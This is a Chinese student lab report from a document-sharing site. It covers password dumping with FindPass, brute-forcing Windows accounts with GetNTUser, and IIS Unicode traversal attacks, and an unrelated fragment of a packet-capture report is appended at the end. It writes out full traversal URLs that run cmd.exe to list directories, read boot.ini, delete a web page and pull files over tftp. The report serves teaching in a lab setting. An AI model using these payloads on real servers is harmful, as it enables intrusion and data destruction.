文档库 最新最全的文档下载
当前位置:文档库 › 网络攻击技术实验报告

网络攻击技术实验报告

网络攻击技术实验报告
网络攻击技术实验报告

XX技术学院

《网络攻击技术实训》

分组总结报告

XX 班 XX 组

组长 XXX

组员 XXX

20XX年 XX 月XX日

目录

一、分组计划及评分表 (3)

二、网络攻击技术实验总结报告 (4)

(一)实训目的 (4)

(二)实训任务 (4)

(三)实训过程及步骤 (4)

一)物理攻击 (4)

二)暴力攻击 (5)

三)漏洞攻击 (7)

(四)实训分析与总结(实训过程遇到的问题、解决方法、收获体会) (10)

一、分组计划及评分表

分组准备及评分表

二、网络攻击技术实验总结报告

(一)实训目的

实训的目的主要是使得我们掌握网络攻击技术领域的基本理论和方法,具有较强的自律意识和信息安全意识,具有使用网络攻击技术的软硬件产品解决实际问题的能力,能够完成一系列的实验内容,并且能够熟练使用相关工具和软件。在实训学习和实践过程中,我们以具体的攻击软件和攻击防范工具,进行相关的技术训练,在强化理论的同时,掌握相关操作技能。通过攻击系统实例演示,使我们了解入侵检测系统的原理和使用。通过网络攻击实例,使我们了解网络攻击实现的原理,加强防范意识。通过实践网络攻击与防范攻击技术,使我们掌握网络攻击及防范技术。

(二)实训任务

1.获取管理员密码攻击。将FindPass.exe拷贝到C盘根目录,执行该程序,即可以得

到管理员密码等信息

2.暴力破解操作系统密码可以用工具软件GetNTUser

3.利用Unicode漏洞进行的攻击:

a)读取出计算机上目录列表

b)读取对方计算机上装了几个操作系统

c)使用Unicode漏洞删除主页

d)利用Unicode漏洞入侵系统

(三)实训过程及步骤

一)物理攻击

获取管理员密码攻击。将FindPass.exe拷贝到C盘根目录,使用命令提示符进入操作界面,输入Findpass命令,执行该程序,即可以得到管理员密码等信息。如图:图1所示是未设置密码时的信息:

图1

如图:图2所示是在设置密码后的现实的信息:

图2

二)暴力攻击

暴力破解操作系统密码可以用工具软件GetNTUser ,字典攻击是最常见的一种暴力攻击。利用人的习惯思维,并尝试各种可能的组合来猜测密码;强壮的密码可有效击败字典攻击,它应该由多位字母、数字、通配符组成。

1).启动GetNTUser软件,得到如图:图3所示的结果

图3

2).添加主机IP10.130.22.100,如图:图4所示:

图4

3).设置字典的选择,如图:图5所示:

图5

4).字典的穷举设置,如图:图6所示:

图6

如图:图7所示:

a)扫描出主机上存在的用户名,管理员为Administrator

b)自动猜测空密码和与用户名相同的密码

c)可以使用指定密码字典猜测密码,密码为空

图7

三)漏洞攻击

利用Unicode漏洞进行的攻击:

a)读取出计算机上目录列表

b)读取对方计算机上装了几个操作系统

c)使用Unicode漏洞删除主页

d)利用Unicode漏洞入侵系统

1.在利用Unicode漏洞进行的攻击时之前,ping两个系统是否连通,如图:图8所示:

图8

2.ping通过后,打开浏览器,浏览器地址栏中输入:

http://192.168.1.110/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\ 得到如图:图9所示的信息:读取出计算机上目录列表

图9

3.读取计算机上的目录列表后,输入:

http://192.168.1.110/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+type+c:\b oot.ini

得到如图:图10所示的信息,读取对方计算机上装了几个操作系统:

图10

4.读取对方计算机上装了几个操作系统后,

在C盘装入inetpub\wwwroot\default.asp,如图:图11所示:

图11

输入:

http://192.168.1.110/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dele+c:\i netpub\wwwroot\default.asp

得到如图:图12所示的信息,使用Unicode漏洞删除主页:

图12

删除c:\inetpub\wwwroot\default.asp过后的信息,如图:图13所示:

图13

图11

5.使用Unicode漏洞删除主页后,利用Unicode漏洞入侵系统

1)首先需要向对方服务器上传一些文件

2)下载一个tftpd32.exe,如图:图14所示:

图14

3)首先在本地计算机上搭建一个TFTP服务器,可以使用 tftpd32.exe建立服务器普通文件传输协议TFTP( Text File Transmission Protocol)一般用来传输单个文件。

4)点击tftpd32.exe文件,设置本机IP为192.168.1.100,被攻击的IP为

192.168.1.110,接收的文件为idq.dll

如图:图15所示:

图15

5)由于权限不够,不能发送名为“idq.dll文件,权限设置好后,系统拒绝传送文件,但是可以从另一个系统获取一个名为“idq.dll”的文件,如图:图16所示:

图16

6)在浏览器中执行命令:

http://192.168.1.100/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp+-i+1 92.168.1.110+get+idq.dll由于权限不够,无法实现。

(四)实训分析与总结(实训过程遇到的问题、解决方法、收获体会)

(1)实训中遇到的问题及解决方法:

1.获取管理员密码攻击时,设置了密码,但是使用FindPass.exe时,没有显示出密

码,讲系统重启过后,显示了密码。

2.暴力破解操作系统密码,使用工具软件GetNTUser时,出现拒绝访问,是设置问题。

3.利用Unicode漏洞进行攻击时,获取另一个系统的信息时,开始的两个系统不匹配,

无法使用Unicode漏洞进行攻击。设置两个系统的关系,包含有漏洞才可行。

4.使用浏览器连接两个系统的文件传输时,无法找到需要的文件,发现是由于权限不

够,设置可读取权限,得到需要的文件。

(2)收获体会:

获取管理员密码攻击。将FindPass.exe拷贝到C盘根目录,执行该程序,即可以得到管理员密码等信息;暴力破解操作系统密码可以用工具软件GetNTUser;利用Unicode 漏洞进行的攻击:读取出计算机上目录列表;读取对方计算机上装了几个操作系统;使用Unicode漏洞删除主页;利用Unicode漏洞入侵系统。

本次实训使得我们掌握网络攻击技术领域的基本理论和方法,具有较强的自律意识和信息安全意识,具有使用网络攻击技术的软硬件产品解决实际问题的能力,能够完成一系列的实验内容,并且能够熟练使用相关工具和软件。在实训学习和实践过程中,我们以具体的攻击软件和攻击防范工具,进行相关的技术训练,在强化理论的同时,掌握相关操作技能。通过攻击系统实例演示,使我们了解入侵检测系统的原理和使用。通过网络攻击实例,使我们了解网络攻击实现的原理,加强防范意识。通过实践网络攻击与防范攻击技术,使我们掌握网络攻击及防范技术。

网络互联技术实验报告

网络互联实验报告 作者:xx通信工程(1)班第二组 组长:xx 组员:xxx、xxx、xxx、xxx、xxx、xxx、xxx、xxx、xx、xx 计算机与信息学院 2011年12月

目录 实验二:路由器与交换机配置技术 (3) 一、配置交换机设备 (3) 二、配置路由器设备 (5) 实验四:生成树与以太网链路聚合 (8) 配置端口聚合提供冗余备份链路 (8) 实验六:交换机端口安全与访问控制列表 (14) 一、配置标准访问控制网络流量 (14) 二、配置扩展访问列表保护服务器安全 (19) 三、配置命令ACL保护办公网安全 (24) 实验七:无线网络技术 (29) 一、安装无线网卡 (29) 二、组建Ad-Hoc模式无线局域网 (30) 三、组建Infrastructure无线局域网 (37) 四、计算机科学技术学院无线项目施工 (45)

实验二:路由器与交换机配置技术 (xxx xxx xxx) 一、路由器的配置 【实验目的】 掌握路由器命令,理解路由器各种不同工作模式之间的切换技术【实验设备】 路由器设备(1台)、配置主机(1台)、配置线(1条) 【实验拓扑】 【实验步骤】 (1)路由器命令行操作模式的进入 Red-Giant>enable !进入特权模式 Red-Giant# Red-Giant#configure terminal !进入全局配置模式 Red-Giant(config)# Red-Giant(config)#interface fastethernet 1/0 !进入路由器F1/0接口模式Red-Giant(config-if) Red-Giant(config-if)#exit !退回上一级操作模式 Red-Giant(config)# Red-Giant(config-if)#end !直接退回特权模式 Red-Giant#

网络攻击与防御 第一次实验

网络工程专业 实验报告 课程:网络攻击与防御题目:远程FTP密码破解学生姓名:张爽 学号:2008122083 班级:信息安全083班 实验时间:2011-6-12 地点:6302 评分:_____________

第一部分:嗅探 一、实验目的 ●掌握远程破解ftp帐号口令破解技术的基本原理、常用方法及相关工具 ●掌握如何有效防范类似攻击的方法和措施 二、实验内容 1.安装工具Cain V2.5。 2.点击进入,选择sniffer下的hosts页。 3.根据嗅探得到的FTP账号和密码,用FTP客户端登录,找到一个ip.txt 文件,获得靶机P2的IP地址。 三、实验仪器(涉及到的服务器及其配置、设计软件名称、版本等) 测试服务器P1的配置为:操作系统Windows2000 Professional SP4或者windows XP sp2,安装了ftp客户端CuteFTP;靶机上的虚拟机P3的配置为:Windows2000 server SP4,安装了serv-u,提供ftp服务;靶机服务器P2的配置为:windows xp sp2。 注意: a. 选择安装路径,在此直接默认安装到C:\Program Files\Cain目录; b. 继续安装winpcap,单击Install按钮; c. 直接默认安装即可。安装完成后会要求重启系统。

四、实验步骤(实验关键操作步骤,关键指令注释等) 1.安装工具Cain V2.5。 进入安装界面: 2.点击进入,选择sniffer下的hosts页,如下图所示: 然后点击上方的“sniffer”和“add to list”按钮,列出当前交换环境中的所

网络互联技术实验报告

网络互联技术实验报告 熟悉常用网络测试指令 班级:B241111 学号:B24111102 姓名:杜悦

一、实验目的 (1)了解系统网络命令及其所代表的含义,以及所能对网络进行的操作。(2)通过网络命令了解网络状态,并利用网络命令对网络进行简单的操作。二、实验设备 自己的笔记本电脑,操作系统是Windows7 三、实验内容和要求 (1)利用ipconfig命令查看本机的网络配置信息 (2)利用ping 命令检测网络连通性 (3)利用arp 命令检验MAC 地址解析 (4)熟练使用netstat、ftp、tracert、pathping、nbtsat、netsh等网络命令 四、背景知识 windows操作系统本身带有多种网络命令,利用这些网络命令可以对网络进行简单的操作。需要注意是这些命令均是在cmd命令行下执行。本次实验学习8个最常用的网络命令。 五、实验准备 1.Ping命令 -t Ping指定的计算机直到中断。 -a 将地址解析为计算机名。 -n count 发送 count 指定的 ECHO 数据包数。默认值为 4 。 -l length 发送包含由 length 指定的数据量的 ECHO 数据包。默认为 32 字节;最大值是 65,527。 -f 在数据包中发送“不要分段”标志。数据包就不会被路由上的网关分段。-i ttl 将“生存时间”字段设置为 ttl 指定的值。

-v tos 将“服务类型”字段设置为 tos 指定的值。 -r count 在“记录路由”字段中记录传出和返回数据包的路由。 count 可以指定最少 1 台,最多 9 台计算机。 -s count 指定 count 指定的跃点数的时间戳。 -j computer-list 利用 computer-list 指定的计算机列表路由数据包。连续计算机可以被中间网关分隔(路由稀疏源) IP 允许的最大数量为 9 。 -k computer-list 利用 computer-list 指定的计算机列表路由数据包。连续计算机不能被中间网关分隔(路由严格源) IP 允许的最大数量为 9 。 -w timeout 指定超时间隔,单位为毫秒。 destination-list 指定要 ping 的远程计算机。 查看ping的相关帮助信息“ping/?” 2.ipconfig命令 ipconfig是WINDOWS操作系统中用于查看主机的IP配置命令,其显示信息中还包括主机网卡的MAC地址信息。该命令还可释放动态获得的IP地址并启动新一次的动态IP分配请求。 ipconfig /all:显示本机TCP/IP配置的详细信息; ipconfig /release:DHCP客户端手工释放IP地址; ipconfig /renew:DHCP客户端手工向服务器刷新请求; ipconfig /flushdns:清除本地DNS缓存内容; ipconfig /displaydns:显示本地DNS内容; ipconfig /registerdns:DNS客户端手工向服务器进行注册; ipconfig /showclassid:显示网络适配器的DHCP类别信息; ipconfig /setclassid:设置网络适配器的DHCP类别。

通信技术综合实验报告

综合实验报告 ( 2010-- 2011年度第二学期) 名称:通信技术综合实验题目:SDH技术综合实验院系:电子与通信工程系班级: 学号: 学生姓名: 指导教师: 设计周数:两周 成绩: 日期:2011年 6 月

A C B D S1 P1S1 P1 主用 备用 AC AC 环形保护组网配置实验 一、实验的目的与要求 1、实验目的: 通过本实验了解2M 业务在环形组网方式时候的配置。 2、实验要求: 在SDH1、SDH2、SDH3配置成环网,开通SDH2到SDH3两个节点间的2M 业务,并提供环网保护机制。 1)掌握二纤单向保护环的保护机理及OptiX 设备的通道保护机理。 2)掌握环形通道保护业务配置方法。采用环形组网方式时,提供3套SDH 设备,要求配置成虚拟单向通道保护环。 3)了解SDH 的原理、命令行有比较深刻,在做实验之前应画出详细的实际网络连接图,提交实验预习报告,要设计出实验实现方案、验证方法及具体的步骤。 4)利用实验平台自行编辑命令行并运行验证实验方案,进行测试实验是否成功。 二、实验正文 1.实验原理 单向通道保护环通常由两根光纤来实现,一根光纤用于传业务信号,称S 光纤;另一根光纤传相同的信号用于保护,称P 光纤。单向通道保护环使用“首端桥接,末端倒换”结构如下图所示: 业务信号和保护信号分别由光纤S1和P1携带。例如,在节点A ,进入环以节点C 为目的地的支路信号(AC )同时馈入发送方向光纤S1和P1。其中,S1光纤按ABC 方向将业务信号送至节点C ,P1光纤按ADC 方向将同样的信号作为保护信号送至分路节点C 。接收端分路节点C 同时收到两个方向支路信号,按照分路通道信号的优劣决定选其中一路作为分路信号,即所谓末端选收。正常情况下,以S1光纤送来信号为主信号。同时,从C 点插入环以节点A 为目的地的支路信号(CA)按上述同样方法送至节点A 。

《计算机的网络技术基础教程》课后习地的题目详解刘四清版

第一章 1.计算机网络是计算机技术与通信技术结合的产物。 2.“网络”主要包含连接对象、连接介质、连接控制机制、和连接方式与结构四个方面。 3.计算机网络最主要的功能是资源共享和通信,除此之外还有负荷均匀与分布处理和提高系统安全与可靠性能等功能。 4.计算机网络产生与发展可分为面向终端的计算机网络、计算机通信网络、计算机互联网络和高速互联网络四个阶段。 5.计算机网络基本组成主要包括计算机系统、通信线路和通信设备、网络协议和网络软件四部分。 6.计算机通信网络在逻辑上可分为资源子网和通信子网两大部分。 7.最常用的网络拓扑结构有总线型结构、环形结构、星型结构、树型结构、网状结构和混合型结构。 8.按照网络覆盖的地理范围大小,可以将网络分为局域网、城域网和广域网。 9.根据所使用的传输技术,可以将网络分为广播式网络和点对点网络。 10.通信线路分为有线和无线两大类,对应于有线传输和无线传输。 11.有线传输的介质有双绞线、同轴电缆和光纤。 12.无线传输的主要方式包括无线电传输、地面微波通信、卫星通信、红外线和激光通信。 问答: 1.例举计算机网络连接的主要对象。 具有独立功能的多台计算机、终端及其附属设备。 2.计算机网络是如何进行负荷均衡与分布处理的? 分为三阶段:提供作业文件;对作业进行加工处理;把处理结果输出。 在单机环境:三阶段在本地计算机系统中进行。 在网络环境:将作业分配给其他计算机系统进行处理,提高系统处理能力和高效完成大型应用系统的程序的计算和大型数据库的访问。 3.举例说明计算机网络在商业上的运用。 网络购物、网上银行、网上订票等。 4.简述什么是“通信子网”?什么是“资源子网”? 资源子网主要负责全网的数据处理,向网络用户提供各种网络资源与网络服务。由主计算机系统(主机)、终端、中断控制器、联网外设、各种软件资源与信息资源组成。 通信子网主要完成网络数据传输和转发等通信处理任务。通信子网由通信控制处理机(CCP)、通信线路和其他通信设备组成。 5.什么是点对点网络? 由许多相互连接的结点构成,在每对机器之间都有一条专用的通信信道,不存在信道的复用和共享。

网络通信实验报告

网络通信程序设计 实验报告 姓名: 学号: 专业:计算机科学与技术 授课教师:贺刚 完成日期: 2020.5.27

实验一:TCP套接字编程 内容: 1、利用阻塞模型的开发TCP通信客户端程序。 2、在程序中必须处理粘连包和残缺包问题。 3、自定义应用层协议。 4、采用多线程开发技术。 实验代码: 服务器端: #include "iostream.h" #include "initsock.h" #include "vector" using namespace std; CInitSock initSock; // 初始化Winsock库 DWORD WINAPI ThreadProc(LPVOID lpParam); vector sClientVector; int main() { //1 创建套节字 SOCKET sListen = ::socket(AF_INET, SOCK_STREAM, 0); if(sListen == INVALID_SOCKET) { cout<<"Failed socket() "<

计算机网络技术基础习题与答案

第三章计算机网络技术基础习题与答案 一、判断题 1.(√)网络节点和链路的几何图形就是网络的拓扑结构,是指网络中网络单元的地理分布和互联关系的几何构型。 2.(×)不同的网络拓扑结构其信道访问技术、网络性能、设备开销等基本相同,适合相同场合。 3.(×)计算机网络的拓扑结构主要是指资源子网的拓扑结构。 4.(√)总线型拓扑结构的网络结构简单、扩展容易,网络中的任何结点的故障都不会造成全网的故障,可靠性较高。 5.(×)星型网络的中心节点是主节点,具有中继交换和数据处理能力,网络结构简单,建网容易,可靠性好。 6.(√)环型网数据传输路径固定,没有路径选择的问题,网络实现简单,适应传输信息量不大的场合,但网络可靠性较差。 7.(√)树状网络是分层结构,适用于分级管理和控制系统,除叶节点及其连线外,任一节点或连线的故障均影响其所在支路网络的正常工作。 8.(√)当网络中各节点连接没有一定规则、地理位置分散,而设计通信线路是主要考虑的因素时,我们通常选用网状网络。 9.(√)总线型拓扑结构分单总线结构和多总线结构,局域网一般采用的是单总线结构。 10.(×)总线型拓扑结构的优点是电缆长度短、可靠性高、故障诊断和隔离容易和实时性强。 11.(×)星型网络拓扑结构集中控制,简单的访问协议,但电缆长度及安装费用高,故障诊断困难、扩展困难,全网工作依赖于中央节点。 12.(√)环型拓扑结构适合于光纤、网络实时性好,但网络扩展配置因难,故障诊断困难,节点故障则引起全网故障。 13.(√)树型拓扑结构易于扩展、故障隔离方便,但对根的依赖性太大,如果根发生故障则全网不能正常工作。 14.(×)网状型拓扑结构是将星型和总线型两种拓扑结构混合起来的一种拓扑结构。 15.(√)网状型拓扑结构的优点是易于扩展、故障的诊断和隔离方便、安装电缆方便。 16.(√)建立计算机网络的根本目的是实现数据通信和资源共享,而通信则是实现所有网络功能的基础和关键。 17.(√)OSI参考模型是一种将异构系统互连的分层结构,提供了控制互连系统交互规则的标准骨架。 18.(×)OSI参考模型定义了一种抽象结构,而并非具体实现的描述,直接的数据传送在传输层。 19.(×)OSI参考模型中,每一层的真正功能是为其下一层提供服务。 20.(√)OSI参考模型中的网络层,是通信子网与用户资源子网之间的接口,是控制通信子网、处理端到端数据传输的最低层。 21.(√)OSI参考模型中的传输层,接收由会话层来的数据,并向高层提供可靠的透明的数据传输,具有差错控制、流量控制及故障恢复功能。 22.(×)OSI参考模型中,数据传送包括语法和语义两个方面的问题,有关语义的处理由表示层负责,有关语法的处理由应用层负责。 23.(×)令牌传递控制法适用星状拓扑网络结构、基带传输。 24.(√)从本质上看,ATM技术是电路交换与分组交换技术相结合的一种高速交换技术。 25.(√)10BASE-T是双绞线以太网,使用两对非屏蔽双绞线,一对线发送数据,一对线接收数据,采用星型拓扑结构。

实验4:拒绝式服务攻击与防范

实验4:拒绝式服务攻击与防范 【实验目的】 熟悉SYNflood的攻击原理与过程,及IPv4所存在的固有缺陷。 【实验准备】 准备xdos.exe拒绝服务工具。 【注意事项】 实验后将DoS黑客软件从机器彻底删除,避免恶意应用影响网络运行。 【实验步骤】 一、拒绝式服务攻击 拒绝服务攻击的英文意思是Denial of Service,简称DoS。这种攻击行动使网站服务器充斥大量要求回复的信息,消耗网络带宽或系统资源,导致网络或系统不胜负荷直至瘫痪而停止提供正常的网络服务。 SYN-Flood是当前最常见的一种Dos攻击方式,它利用了TCP协议的缺陷进行攻击

用黑客软件xdos.exe对目标计算机进行拒绝服务攻击并运行测试。(1)计算机a登录到windows 2000,打开sniffer pro,在sniffer pro中配置好捕捉从任意 主机发送给本机的ip数据包,并启动捕捉进程。

(2)在计算机B上登录Windows 2000,打开命令提示窗口,运行xdos.exe,命令的格式:‖xdos<目标主机IP>端口号–t 线程数[-s <插入随机IP>’]‖(也可以用―xdos?‖命令查看使用方法)。输入命令:xdos 192.168.19.42 80 –t 200 –s* 确定即可进行攻击,192.168.19.42 是计 算机A的地址。

(3)在A端可以看到电脑的处理速度明显下降,甚至瘫痪死机,在Sniffer Pro的Traffic Map 中看到最大伪造IP的主机请求与A的电脑建立连接。 (4)B停止攻击后,A的电脑恢复快速响应。打开捕捉的数据包,可以看到有大量伪造IP地址的主机请求与A的电脑连接的数据包,且都是只请求不应答。以至于A的电脑保持有大量的半开连接。运行速度下降直至瘫痪死机,拒绝为合法的请求服务。 二、拒绝式服务防范 几乎所有的主机平台都有抵御DoS的设置,常见的有以下几种。(1)关闭不必要的服务。 Windows XP系统步骤如下:

网络攻击与防御实验报告全解

西安电子科技大学 本科生实验报告 姓名:王东林 学院:计算机科学院 专业:信息安全 班级:13级本科班 实验课程名称:网络攻击与防御 实验日期:2015年10月15日 指导教师及职称:金涛 实验成绩: 开课时间: 2016-2017 学年第一学期

实验题目网络攻击与防御小组合作否 姓名王东林班级13级信息安全本科班学号201383030115 一、实验目的 1.了解网络连通测试的方法和工作原理。 2.掌握ping命令的用法。 3.了解网络扫描技术的基本原理。 4.掌握xscan工具的使用方法和各项功能。 5.通过使用xscan工具,对网络中的主机安全漏洞信息等进行探测。 6.掌握针对网络扫描技术的防御方法。 7.了解路由的概念和工作原理。 8.掌握探测路由的工具的使用方法和各项功能,如tracert等。 9.通过使用tracert工具,对网络中的路由信息等进行探测,学会排查网络故 障。 10.了解网络扫描技术的基本原理。 11.掌握nmap工具的使用方法和各项功能。 12.通过使用nmap工具,对网络中的主机信息等进行探测。 13.掌握针对网络扫描技术的防御方法。 14.掌握Linux帐号口令破解技术的基本原理、常用方法及相关工具 15.掌握如何有效防范类似攻击的方法和措施 16.掌握帐号口令破解技术的基本原理、常用方法及相关工具 17.掌握如何有效防范类似攻击的方法和措施 18.掌握帐号口令破解技术的基本原理、常用方法及相关工具 19.掌握如何有效防范类似攻击的方法和措施

二.实验环境 1、实验环境 1)本实验需要用到靶机服务器,实验网络环境如图1所示。 靶机服务器配置为Windows2000 Server,安装了IIS服务组件,并允许FTP匿名登录。由于未打任何补丁,存在各种网络安全漏洞。在靶机服务器上安装有虚拟机。该虚拟机同样是Windows2000 Professional系统,但进行了主机加固。做好了安全防范措施,因此几乎不存在安全漏洞。 2)学生首先在实验主机上利用Xscan扫描靶机服务器P3上的漏洞,扫描结束发现大量漏洞之后用相同方法扫描靶机服务器上的虚拟机P4。由于该靶机服务器上的虚拟机是安装了各种补丁和进行了主机加固的,因此几乎没有漏洞。在对比明显的实验结果中可见,做好安全防护措施的靶机服务器虚拟机上的漏洞比未做任何安全措施的靶机服务器少了很多,从而加强学生的网络安全意识。实验网络拓扑如图1。 三. 实验内容与步棸 Ping命令是一种TCP/IP实用工具,在DOS和UNIX系统下都有此命令。它将您的计算机与目标服务器间传输一个数据包,再要求对方返回一个同样大小的数据包来确定两台网络机器是否连接相通。 1.在命令提示符窗口中输入:ping。了解该命令的详细参数说明。

网络风暴实验报告

《网络管理与维护》 ----实验二VLAN与网络风暴 班级:网络一班 专业:网络工程 姓名:王双双 学号: 090810127 小组:第三组 实验地点: N6-207 计算机科学与工程学院 2012年2月

一、实验要求 1、掌握巩固网络互联技术知识点。 2、完成实验分析报告。 二、实验内容 使用实验设备(包括两台二层交换机,一台路由器),按以下拓扑图(图1)搭建试验网。 1、通过连接回路在VLAN-I中设置广播风暴观察两个VLAN-I、II的网络状 况,如何消除广播风暴。 2、路由器具有隔离广播域的作用,依图2所示,搭建实验环境并分析网络状 况。 三、实验步骤

1、对交换机的配置 步骤一:将SW1划分两个VLAN,分别为VLAN10、VLAN20。 Switch#confi term Switch(config)#hostname SW1 SW1(config)#vlan 10 SW1(config-vlan)#exit SW1(config)#vlan 20 SW1(config)#end 步骤二:将接口分配到SW1上的VLAN SW1#config term SW1(config)#interface fasteternet 0/1 SW1(config-if)#switchport access vlan 10 SW1(config-if)#exit SW1(config)#interface fasteternet 0/2 SW1(config-if)#switchport access vlan 10 SW1(config-if)#exit SW1(config)#interface fastethernet 0/3 SW1(config-if)#switchport access vlan 20 SW1(config-if)#exit SW1(config)#interface fastethernet 0/4 SW1(config-if)#switchport access vlan 20 步骤三:把交换机SW1与交换机SW2相连的端口(假设为0/24端口)定义为tag vlan 模式。 SW1(config)#inter fastethernet0/24 SW1(config-if)#switchport mode trunk 步骤四:将SW2划分两个VLAN,分别为VLAN10、VLAN20。 Switch#confi term Switch(config)#hostname SW2 SW2(config)#vlan 10 SW2(config-vlan)#exit SW2(config)#vlan 20 SW2(config)#end 步骤五:将接口分配到SW2上的VLAN SW1#config term SW2(config)#interface fasteternet 0/1 SW2(config-if)#switchport access vlan 10 SW2(config-if)#exit SW2(config)#interface fasteternet 0/2 SW2(config-if)#switchport access vlan 10 SW2(config-if)#exit SW2(config)#interface fastethernet 0/3 SW2(config-if)#switchport access vlan 20 SW2(config-if)#exit

实验一:交叉线的制作

《网络互联技术》课程实验指导书 实验一:交叉线的制作 一、实验内容 1、制作直通网线 2、制作交叉网线 二、实验目的 1、掌握EIA 586A标准 2、掌握EIA 586B标准 3、了解直通线的应用环境 4、了解交叉线的应用环境 5、学会直通线的制作 6、学会交叉线的制作 三、实验原理 直通线一般用于连接不同类别的设备,如主机与交换机、交换机与路由器。在制作直通线时,两端必须遵循相同的制作标准。要么两端全按EIA 586A标准进行制作,要么两端全按EAI 586B标准进行制作。 交叉线一般用于连接同类别的设备,如主机与主机、路由器与路由器、交换机与交换机之间的连接。由于主机接口与路由器接口类别相同,因此,主机与路由器之间的连接也采用交叉线。在制作交叉线时,一端按照586A标准进行制作,另一端要按照586B标准进行制作。 1、EIA 586A 标准 2、EIA 586B标准 3、网线正确插入的方向

四、实验仪器设备: 1、网线测试器 2、五类电缆线若干 3、水晶头若干 4、压线钳 5、剥线刀或剪刀 五、交叉线制作步骤 1、剥线:用压线钳剪线刀口将线头剪齐,再将双绞线端头伸入剥线刀口,使线头触及前挡板,然后适度握紧压线钳同时慢慢旋转双绞线,让刀口划开双绞线的保护胶皮,取出端头从而拨下保护胶皮,露出里面的4对导线。在剥线时要注意掌握好力度,不要使刀口划破里面的导线绝缘层。 2、理线:双绞线由8根有色导线两两绞合而成,若制作直通线,则将其整理成按TIA/EIA568B标准进行平行排列,整理完毕用剪线刀口将前端修齐。如果要制作交叉线,另一端则需要按照TIA/EIA568A标准。 3、插线:一只手捏住水晶头,将水晶头有弹片一侧向下,另一只手捏平双绞线,稍稍用力将排好的线平行插入水晶头内的线槽中,八条导线顶端应插入线槽顶端。 4、压线:确认所有导线都到位后,将水晶头放入夹线钳夹槽中,用力捏几下压线钳,压紧线头即可。 5、测线:制作完成后,需要使用测试仪进行网线测试。请观察测试交叉线时指示灯的显示状态,并进行记录。 6、连接:制作完成交叉线后,使用它将两台计算机直接相连,以测试网络的连通性。 六、思考问题 1、网线为什么要分为直通线和交叉线? 2、主机与路由器之间互联应使用直通线还是交叉线?为什么? 七、实验报告要求: 按学院实验报告要求完成实验报告的书写。 1、在实验名称的下方写明当前实验的时间(年月日)。 2、在实验报告中必须回答当前实验的思考问题。

计算机网络技术实验报告

重庆交通大学 学生实验报告 实验课程名称《计算机网络技术》课程实验 开课实验室软件与通信实验中心 学院国际学院年级2012 专业班(1)班 学生姓名吴双彪学号6312260030115 开课时间2014 至2015 学年第二学期 实验2简单的局域网配置与资源共享 实验目的: 1、掌握将两台PC联网的技能与方法 2、掌握将几台PC连接成LAN的技能与方法 3、掌握局域网内资源共享的技能与方法 实验内容和要求: 1、选用百兆交换机连接PC若干台; 2、在上述两种情况下分别为PC配置TCP/IP协议,使他们实现互联和资源共享实验环境:(画出实验网络拓图) 实验步骤: 1、选择两台计算机; 选PC0与PC1. 2、设置两台计算机IP地址为C类内部地址; 两台PC机的IP分别设置为:、202.202.242.47、202.202.243.48; 两台PC机的掩码分别设置为:、255.255.255.0、255.255.255.0; 3、用一台计算机Ping另一台计算机,是否能Ping通?

4、我的电脑→工具→文件夹选项→查看→去掉“使用简单文件共享(推荐)”前 的勾;设置共享文件夹。 5、控制面板→管理工具→本地安全策略→本地策略→安全选项里,把“网络访 问:本地帐户的共享和安全模式”设为“仅来宾-本地用户以来宾的身份验证” (可选,此项设置可去除访问时要求输入密码的对话框,也可视情况设为“经典-本地用户以自己的身份验证”); 6、通过网络邻居或在运行窗口输入“\\对方IP地址”实现资源共享。 1)指定IP地址,连通网络 A.设置IP地址 在保留专用IP地址范围中(192.168.X.X),任选IP地址指定给主机。 注意:同一实验分组的主机IP地址的网络ID应相同 ..。 ..,主机ID应不同 ..,子网掩码需相同B.测试网络连通性 (1)用PING 命令PING 127.0.0.0 –t,检测本机网卡连通性。 解决方法:检查网线是否连接好,或者网卡是否完好 (2)分别“ping”同一实验组的计算机名;“ping”同一实验组的计算机IP地址,并记录结 果。答:能。结果同步骤3 (3)接在同一交换机上的不同实验分组的计算机,从“网上邻居”中能看到吗?能ping通 吗?记录结果。 2) 自动获取IP地址,连通网络 Windows主机能从微软专用B类保留地址(网络ID为169.254)中自动获取IP地址。 A.设置IP地址 把指定IP地址改为“自动获取IP地址”。 B.在DOS命令提示符下键入“ipconfig”,查看本机自动获取的IP地址,并记录结果。 C.测试网络的连通性 1.在“网上邻居”中察看能找到哪些主机,并记录结果。 2.在命令提示符下试试能“ping”通哪些主机,并记录结果。 答:能ping通的主机有KOREYOSHI ,WSB ,ST ,LBO ,CL 。思考并回答 测试两台PC机连通性时有哪些方法? 实验小结:(要求写出实验中的体会)

网络攻击与防范实验报告

网络攻击与防御技术实验报告 姓名:____刘冰__ ___ 学号:__ 所在班级: 实验名称:网络数据包的捕获与分析实验日期:_2007_年_10 _月_15 _日指导老师:实验评分: 验收评语: 参与人员: 实验目的: 本实验通过研究Winpcap中常用的库函数的使用方式来实现了一个小型的网络数据包抓包器,并通过对原始包文的分析来展示当前网络的运行状况。 实验内容: 1.实现对网络基本数据包的捕获 2.分析捕获到的数据包的详细信息 实验环境: 1.WpdPack_4_0_1支持库 2.VC++6.0开发环境 3.Windows操作系统 实验设计: 系统在设计过程中按照MVC的设计模式,整体分为三层。第一层为Control层即控制层,这里为简化设计,将Control层分为两个部分,一部分为网络报文输入,另一部分为用户输入;第二层是Model层即模型层;第三层为View层即显示层。 系统的整体运行过程为:从Control层得到数据,交到Model层进行处理,将处理完的结果交View层进行显示。Control层主要用于网络数据包的捕获以及获得用户的输入;Model层主要用于分析数据包,处理用户的输入;View层主要用于对处理后的结果进行显示。

